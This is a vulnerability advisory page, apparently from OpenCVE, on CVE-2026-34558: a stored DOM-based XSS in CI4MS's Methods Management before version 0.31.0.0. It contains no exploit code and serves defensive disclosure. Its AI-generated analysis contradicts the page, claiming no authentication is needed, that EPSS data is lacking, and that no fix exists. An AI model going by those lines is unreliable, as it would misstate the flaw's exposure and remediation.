Description
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Methods Management functionality when creating or managing application methods/pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding. These stored values are later rendered directly into administrative interfaces and global navigation components without proper encoding, resulting in Stored DOM-Based Cross-Site Scripting (XSS). This issue has been patched in version 0.31.0.0.
Published: 2026-03-30
Score: 9.1 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Stored DOM XSS enabling full account takeover
Action: Patching
AI Analysis

Impact

CI4MS, a CodeIgniter‑based CMS framework, stores JavaScript payloads submitted through the Methods Management panel without sanitization or encoding. The stored script is later injected into administrative pages and global navigation, causing a stored, DOM‑based cross‑site scripting vulnerability. The flaw allows an attacker to execute code in the session of any user who views the affected content, potentially leading to complete administrative compromise and privilege escalation.

Affected Systems

All CI4MS releases earlier than 0.31.0.0 are susceptible. The weakness resides in the Methods Management component of the CMS, where users can create or modify application methods and pages via web forms.

Risk and Exploitability

The base CVSS score of 9.1 reflects a high‑severity condition with no network or authentication requirements beyond normal CMS usage. The exploit is straightforward: craft a malicious script, submit it through the management interface, and trigger its execution when an administrator accesses the affected view. Although EPSS data is lacking and the vulnerability is not listed in CISA’s Known Exploited Vulnerabilities catalog, the high CVSS and low attack complexity make it likely to be abused if unpatched.

Generated by OpenCVE AI on March 31, 2026 at 06:25 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the official patch by upgrading CI4MS to version 0.31.0.0 or later
  • If an immediate upgrade is impossible, temporarily disable or restrict access to the Methods Management functionality until the patch is deployed
  • As an interim measure, perform server‑side input filtering or output encoding on all fields accepting user input in the management panel
  • Consider deploying a WAF rule to block script injections targeting the CMS management endpoints

Generated by OpenCVE AI on March 31, 2026 at 06:25 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-v77r-xg3p-75g7 CI4MS: Methods Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS
History

Wed, 01 Apr 2026 02:15:00 +0000

Type Values Removed Values Added
First Time appeared Ci4-cms-erp
Ci4-cms-erp ci4ms
Vendors & Products Ci4-cms-erp
Ci4-cms-erp ci4ms

Tue, 31 Mar 2026 16:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 31 Mar 2026 03:00:00 +0000

Type Values Removed Values Added
Description CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Methods Management functionality when creating or managing application methods/pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding. These stored values are later rendered directly into administrative interfaces and global navigation components without proper encoding, resulting in Stored DOM-Based Cross-Site Scripting (XSS). This issue has been patched in version 0.31.0.0.
Title CI4MS: Methods Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 9.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L'}

Subscriptions

Ci4-cms-erp Ci4ms
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-31T15:25:20.115Z

Reserved: 2026-03-30T16:31:39.265Z

Link: CVE-2026-34558

cve-icon Vulnrichment

Updated: 2026-03-31T15:25:16.390Z

cve-icon NVD

Status : Received

Published: 2026-03-30T21:17:10.493

Modified: 2026-03-30T21:17:10.493

Link: CVE-2026-34558

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-03-31T20:40:09Z

Weaknesses